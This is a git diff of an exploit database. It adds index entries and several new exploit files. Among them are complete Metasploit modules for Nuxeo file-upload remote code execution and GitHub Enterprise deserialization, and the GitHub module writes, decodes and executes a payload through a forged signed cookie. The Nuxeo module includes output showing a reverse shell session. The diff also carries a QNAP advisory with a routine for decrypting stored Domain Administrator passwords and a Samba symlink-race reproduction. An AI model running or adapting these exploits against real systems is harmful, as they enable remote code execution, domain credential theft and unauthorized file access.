diff --git a/files.csv b/files.csv index 85b240f5b..88591ad97 100644 --- a/files.csv +++ b/files.csv @@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0 -36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0 +36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 @@ -5425,6 +5425,11 @@ id,file,description,date,author,platform,type,port 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 +41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0 +41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0 +41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0 +41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0 +41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8887,6 +8892,7 @@ id,file,description,date,author,platform,type,port 41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0 41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0 +41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15390,6 +15396,9 @@ id,file,description,date,author,platform,type,port 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0 +41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0 +41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0 +41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37261,7 +37270,7 @@ id,file,description,date,author,platform,type,port 41137,platforms/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 41138,platforms/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 41139,platforms/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",php,webapps,0 -41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0 +41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0 41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0 41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0 41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0 @@ -37630,3 +37639,19 @@ id,file,description,date,author,platform,type,port 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 +41724,platforms/php/webapps/41724.txt,"Just Another Video Script 1.4.3 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41725,platforms/php/webapps/41725.txt,"Adult Tube Video Script - SQL Injection",2017-03-25,"Ihsan Sencan",php,webapps,0 +41726,platforms/php/webapps/41726.txt,"Alibaba Clone Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41727,platforms/php/webapps/41727.txt,"B2B Marketplace Script 2.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41728,platforms/php/webapps/41728.txt,"Php Real Estate Property Script - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41729,platforms/php/webapps/41729.txt,"Courier Tracking Software 6.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41730,platforms/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 +41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0 +41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0 +41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0 +41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0 +41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0 +41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0 diff --git a/platforms/hardware/local/41745.txt b/platforms/hardware/local/41745.txt new file mode 100755 index 000000000..3afb67238 --- /dev/null +++ b/platforms/hardware/local/41745.txt @@ -0,0 +1,215 @@ +QNAP QTS Domain Privilege Escalation Vulnerability + + Name Sensitive Data Exposure in QNAP QTS + Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4 + Severity High 7.9/10 + Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L + Vendor http://www.qnap.com/ + Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt + Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) + Guido "go" Oricchio (g.oricchio AT pcego DOT com) + Date 20170322 + +I. BACKGROUND + +QNAP Systems, founded in 2004, provides network attached storage (NAS) +and network video recorder (NVR) solutions for home and business use to +the global market. +QNAP also delivers a cloud service, called myQNAPcloud, that allows +users to access and manage the devices from anywhere. +QTS is a QNAP devices proprietary firmware based on Linux. + +ISGroup (http://www.isgroup.biz/) is an Italian Information Security +boutique, we found this 0day issue while supporting Guido Oricchio +of PCego, a System Integrator, to secure a QNAP product for one of his +customer. + +Responsible disclosure with Qnap: we contacted qnap on public security@ +contact and we escalate fast to their Security Researcher Myron Su on +PGP emails. + +Prior vulnerabilities in QNAP: +https://www.qnap.com/en/support/con_show.php?op=showone&cid=41 + +Information to customers of the vulnerability is shown in their bulletin +ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113): +QTS 4.2.4 Build 20170313 includes security fixes for the following +vulnerabilities: Configuration file vulnerability (CVE-2017-5227) +reported by Pasquale Fiorillo of the cyber security company ISGroup +(www.isgroup.biz), a cyber security company, and Guido Oricchio of +PCego (www.pcego.com), a system integrator. + +The latest version of the software at the time of writing can be +obtained from: + +https://www.qnap.com/en-us/product_x_down/ +https://start.qnap.com/en/index.php +https://www.qnap.com/ + +II. DESCRIPTION + +The vulnerability allows a local QTS admin user, or other low privileged +user, to access configuration file that includes a bad crypted Microsoft +Domain Administrator password if the NAS was joined to a Microsoft +Active Directory domain. + +The affected component is the "uLinux.conf" configuration file, +created with a world-readable permission used to store a Domain +Administrator password. + +Admin user can access the file using ssh that is enabled by default. +Other users are not allowed to login, so they have to exploit a +component, such as a web application, to run arbitrary command or +arbitrary file read. + +TLDR: Anyone is able to read uLinux.conf file, world readable by +default, can escalate to Domain Administrator if a NAS is a domain +member. + +III. ANALYSIS + +QNAP QTS stores "uLinux.conf" configuration file in a directory +accessible by "nobody" and with permission that make them readable by +"nobody". + +If the NAS was joined to an Active Directory, such file contain a Domain +Administrator user and password in an easily decrypt format. + +In older versions of QTS the Domain Admin's password was stored in +plaintext. + +A) Config file readable by "nobody" + + [~] # ls -l /etc/config/uLinux.conf + -rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf + + Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, + TS-469L, and TS-221. Access to the needed file are guaranteed to + all the local users, such as httpdusr used to running web sites and + web application hosted on the NAS. + + This expose all the information contained in the configuration file at + risk and this is a violation of the principle of least privilege. + + https://en.wikipedia.org/wiki/Principle_of_least_privilege + +B) Weak encrypted password in the configuration file + + The Microsoft Active Directory Admin username and password are stored + in the file obfuscated by a simple XOR cypher and base64 encoded. + + In this scenario, a Local File Read vulnerability could lead to full + domain compromise given the fact that an attacker can re-use such + credentials to authenticate against a Domain Controller with maximum + privileges. + + The password field in the uLinux.conf has the following format: + + User = + Password = + + eg: + User = Administrator + Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw== + + The "" decoded is: + + sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C + 00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## | + 00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C| + 00000019 + + Each byte xored with \x62 is the hex ascii code of the plaintext char. + Eg: + \x03 ^ \x62 = \x61 (a) + \x00 ^ \x62 = \x61 (b) + ... + \x24 ^ \x62 = \x46 (F) + \x43 ^ \x62 = \x21 (!) + + The plaintext password is: aabbccddeeffAABBCCDDEEFF! + +IV. EXPLOIT + +The following code can be used to decode the password: + +#!/usr/bin/php + "Nuxeo Platform File Upload RCE", + 'Description' => %q{ + The Nuxeo Platform tool is vulnerable to an authenticated remote code execution, + thanks to an upload module. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Ronan Kervella '], + 'References' => + [ + ['https://nuxeo.com/', ''] + ], + 'Platform' => %w{linux}, + 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ], + 'Arch' => ARCH_JAVA, + 'Privileged' => true, + 'Payload' => {}, + 'DisclosureDate' => "", + 'DefaultTarget' => 0)) + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']), + OptString.new('USERNAME', [true, 'A valid username', '']), + OptString.new('PASSWORD', [true, 'Password linked to the username', '']) + ], self.class) + end + + def jsp_filename + @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp' + end + + def jsp_path + 'nxserver/nuxeo.war/' + jsp_filename + end + + def nuxeo_login + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/login.jsp') + ) + + fail_with(Failure::Unreachable, 'No response received from the target.') unless res + session_cookie = res.get_cookies + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'), + 'cookie' => session_cookie, + 'vars_post' => { + 'user_name' => datastore['USERNAME'], + 'user_password' => datastore['PASSWORD'], + 'submit' => 'Connexion' + } + ) + return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces') + nil + end + + def trigger_shell + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, jsp_filename) + ) + fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200 + end + + def exploit + print_status("Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + session_cookie = nuxeo_login + if session_cookie + payload_url = normalize_uri(target_uri.path, jsp_filename) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'), + 'cookie' => session_cookie, + 'headers' => { + 'X-File-Name' => '../../' + jsp_path, + 'X-Batch-Id' => '00', + 'X-File-Size' => '1024', + 'X-File-Type' => '', + 'X-File-Idx' => '0', + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'ctype' => '', + 'data' => payload.encoded + ) + fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200 + print_status("Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.") + trigger_shell + else + fail_with(Failure::Unknown, 'Unable to login') + end + end + +end + +=begin +Module output: + +```bash +msf> use exploit/multi/http/nuxeo +msf exploit(nuxeo) > set USERNAME user1 +USERNAME => user1 +msf exploit(nuxeo) > set PASSWORD password +PASSWORD => password +msf exploit(nuxeo) > set rhost 192.168.253.132 +rhost => 192.168.253.132 +msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp +payload => java/jsp_shell_reverse_tcp +msf exploit(nuxeo) > set lhost 192.168.253.1 +lhost => 192.168.253.1 +msf exploit(nuxeo) > exploit + +[-] Handler failed to bind to 192.168.253.1:4444:- - +[*] Started reverse TCP handler on 0.0.0.0:4444 +[*] Authenticating using user1:password +[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp. +[*] Command shell session 1 opened (172.17.0.2:4444 -> +192.168.253.132:43279) at 2017-01-13 14:47:25 +0000 + +id +uid=1000(nuxeo) gid=1000(nuxeo) +groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare) +pwd +/var/lib/nuxeo/server +``` + +# Vulnerable code + +The vulnerable code is located in the +`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github +link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)), +where the header ``X-File-Name`` is not checked. + +# Fix + +Nuxeo provided a +[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892) +for this issue. +A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35). + +Please note that vulnerability does not affect Nuxeo versions above 7.3. + +# Affected versions + +* Nuxeo 6.0 (LTS 2014), released 2014-11-06 +* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15 +* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24 +* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24 + +# Unaffected versions + +* Nuxeo 6.0 HF35, released 2017-01-12 +* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02 +* Nuxeo 7.10 (LTS 2015), released 2015-11-09 +* Nuxeo 8.10 (LTS 2016), released 2016-12-06 + +# Credits + +Ronan Kervella + +-- SYSDREAM Labs +GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 +* Website: https://sysdream.com/ +* Twitter: @sysdream +=end \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/41723.c b/platforms/lin_x86/shellcode/41723.c index e04a4a220..21c3a957a 100755 --- a/platforms/lin_x86/shellcode/41723.c +++ b/platforms/lin_x86/shellcode/41723.c @@ -2,7 +2,6 @@ ; File name: reversebash.nasm ; Author: Jasmin Landry (@JR0ch17) ; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119 -; To change ; Shellcode length: 110 bytes ; Tested on Ubuntu 12.04.5 32-bit (x86) ; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g diff --git a/platforms/linux/remote/41744.rb b/platforms/linux/remote/41744.rb new file mode 100755 index 000000000..e2dd903ff --- /dev/null +++ b/platforms/linux/remote/41744.rb @@ -0,0 +1,195 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "Github Enterprise Default Session Secret And Deserialization Vulnerability", + 'Description' => %q{ + This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6. + The first is that the session management uses a hard-coded secret value, which can be + abused to sign a serialized malicious Ruby object. The second problem is due to the + use of unsafe deserialization, which allows the malicious Ruby object to be loaded, + and results in arbitrary remote code execution. + + This exploit was tested against version 2.8.0. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'iblue ', # Original discovery, writeup, and PoC (he did it all!) + 'sinn3r' # Porting the PoC to Metasploit + ], + 'References' => + [ + [ 'EDB', '41616' ], + [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ], + [ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version + ], + 'Platform' => 'linux', + 'Targets' => + [ + [ 'Github Enterprise 2.8', { } ] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8443 + }, + 'Privileged' => false, + 'DisclosureDate' => 'Mar 15 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/']) + ], self.class) + end + + def secret + '641dd6454584ddabfed6342cc66281fb' + end + + def check + uri = normalize_uri(target_uri.path, 'setup', 'unlock') + res = send_request_cgi!({ + 'method' => 'GET', + 'uri' => uri, + 'vars_get' =>{ + 'redirect_to' => '/' + } + }) + + unless res + vprint_error('Connection timed out.') + return Exploit::CheckCode::Unknown + end + + unless res.get_cookies.match(/^_gh_manage/) + vprint_error('No _gh_manage value in cookie found') + return Exploit::CheckCode::Safe + end + + cookies = res.get_cookies + vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...") + gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first) + data = gh_manage_value.split('--').first + hmac = gh_manage_value.split('--').last.split(';', 2).first + vprint_status("Data: #{data.gsub(/\n/, '')}") + vprint_status("Extracted HMAC: #{hmac}") + expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) + vprint_status("Expected HMAC: #{expected_hmac}") + + if expected_hmac == hmac + vprint_status("The HMACs match, which means you can sign and tamper the cookie.") + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def get_ruby_code + b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin" + bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin" + register_file_for_cleanup(b64_fname, bin_fname) + p = Rex::Text.encode_base64(generate_payload_exe) + + c = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; " + c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); " + c << "%x(chmod +x #{bin_fname}); " + c << "%x(#{bin_fname})" + c + end + + + def serialize + # We don't want to run this code within the context of Framework, so we run it as an + # external process. + # Brilliant trick from Brent and Adam to overcome the issue. + ruby_code = %Q| + module Erubis;class Eruby;end;end + module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end + + erubis = Erubis::Eruby.allocate + erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\" + proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate + proxy.instance_variable_set :@instance, erubis + proxy.instance_variable_set :@method, :result + proxy.instance_variable_set :@var, "@result" + + session = + { + 'session_id' => '', + 'exploit' => proxy + } + + print Marshal.dump(session) + | + + serialized_output = `ruby -e "#{ruby_code}"` + + serialized_object = [serialized_output].pack('m') + hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object) + + return serialized_object, hmac + end + + def send_serialized_data(dump, hmac) + uri = normalize_uri(target_uri.path) + gh_manage_value = CGI.escape("#{dump}--#{hmac}") + cookie = "_gh_manage=#{gh_manage_value}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie + }) + + if res + print_status("Server returned: #{res.code}") + end + end + + def exploit + dump, hmac = serialize + print_status('Serialized Ruby stager') + + print_status('Sending serialized Ruby stager...') + send_serialized_data(dump, hmac) + end + +end + +=begin + +Handy information: + +To deobfuscate Github code, use this script: +https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42 + +Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this +algorithm: + +* Takes the session hash (Json) in env['rack.session'] +* Marshal.dump the hash into a string +* Base64 the string +* Append a hash of the data at the end of the string to prevent tampering. +* The signed data is saved in _gh_manage' + +The format looks like this: + +[ DATA ]--[ Hash ] + +Also see: +https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb + +=end \ No newline at end of file diff --git a/platforms/multiple/dos/41741.html b/platforms/multiple/dos/41741.html new file mode 100755 index 000000000..dd9771a46 --- /dev/null +++ b/platforms/multiple/dos/41741.html @@ -0,0 +1,56 @@ + + + + + + + diff --git a/platforms/multiple/dos/41742.html b/platforms/multiple/dos/41742.html new file mode 100755 index 000000000..b76fa6056 --- /dev/null +++ b/platforms/multiple/dos/41742.html @@ -0,0 +1,55 @@ + + + + + + + diff --git a/platforms/multiple/dos/41743.html b/platforms/multiple/dos/41743.html new file mode 100755 index 000000000..9ef97b29f --- /dev/null +++ b/platforms/multiple/dos/41743.html @@ -0,0 +1,70 @@ + + + + + + + diff --git a/platforms/multiple/remote/41740.txt b/platforms/multiple/remote/41740.txt new file mode 100755 index 000000000..84f8b3f03 --- /dev/null +++ b/platforms/multiple/remote/41740.txt @@ -0,0 +1,94 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039 + +The Samba server is supposed to only grant access to configured share +directories unless "wide links" are enabled, in which case the server is allowed +to follow symlinks. The default (since CVE-2010-0926) is that wide links are +disabled. + +smbd ensures that it isn't following symlinks by calling lstat() on every +path component, as can be seen in strace (in reaction to the request +"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share): + +root@debian:/home/user# strace -e trace=file -p18954 +Process 18954 attached +lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +getcwd("/public", 4096) = 8 +lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 +lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available) +stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0 +open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35 + + +This is racy: Any of the path components - either one of the directories or the +file at the end - could be replaced with a symlink by an attacker over a second +connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i +with a symlink to / immediately before the open() call would cause smbd to open +/j. + +To reproduce: + + - Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian + unstable. I'm running the attacks on a native machine while the server is + running in a VM on the same machine.) + - On the server, create a world-readable file "/secret" that contains some + text. The goal of the attacker is to leak the contents of that file. + - On the server, create a directory "/public", mode 0777. + - Create a share named "public", accessible for guests, writable, with path + "/public". + - As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in + attack_commands.patch. + - Build the patched copy of samba-4.5.2. The built smbclient will be used in + the following steps. + - Prepare the server's directory layout remotely and start the rename side of + the race: + + $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public + ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it + Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] + smb: \> posix + Server supports CIFS extensions 1.0 + Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt + smb: /> ls + . D 0 Wed Dec 14 23:54:30 2016 + .. D 0 Wed Dec 14 13:02:50 2016 + + 98853468 blocks of size 1024. 66181136 blocks available + smb: /> symlink / link + smb: /> mkdir normal + smb: /> put /tmp/empty normal/secret # empty file + putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s) + smb: /> rename_loop link normal foobar + + - Over a second connection, launch the read side of the race: + + $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public + ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it + Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] + smb: \> posix + Server supports CIFS extensions 1.0 + Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt + smb: /> dump foobar/secret + + - At this point, the race can theoretically be hit. However, because the + renaming client performs operations synchronously, the network latency makes + it 